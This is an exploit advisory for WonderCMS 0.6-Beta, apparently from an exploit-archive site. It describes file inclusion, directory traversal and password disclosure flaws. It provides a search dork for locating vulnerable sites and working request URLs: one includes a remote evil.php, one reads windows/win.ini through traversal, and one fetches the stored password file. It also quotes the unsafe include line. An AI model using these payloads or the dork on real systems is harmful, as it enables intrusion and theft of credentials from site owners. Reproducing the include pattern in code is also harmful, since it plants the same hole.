Wonder CMS version 0.6-Beta suffers from inclusion, password disclosure, and directory traversal vulnerabilities.
397399516a0b38c8578b9229ed23840b442e7ec378ee95438a4c113226f252da
| # Title : WonderCMS 0.6-Beta Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : ©2015 Your website | Powered by WonderCMS | Login
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : https://wondercms.com/
=======================================
File inclusion :
Line 17 : <?php if(isset($_REQUEST['hook']))include($_REQUEST['hook']); ?>
https://127.0.0.1/wondercms/js/editInplace.php?hook=https://127.0.0.1/evil.php
Directory traversal :
Line 17 : if(changing)return;
https://127.0.0.1//wondercms/js/editInplace.php?hook=../../../../../../../../../../windows/win.ini
Password Disclosure :
https://127.0.0.1/wondercms/files/password
Greetz :
jericho https://attrition.org & https://www.osvdb.org/ * packetstormsecurity.com * https://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------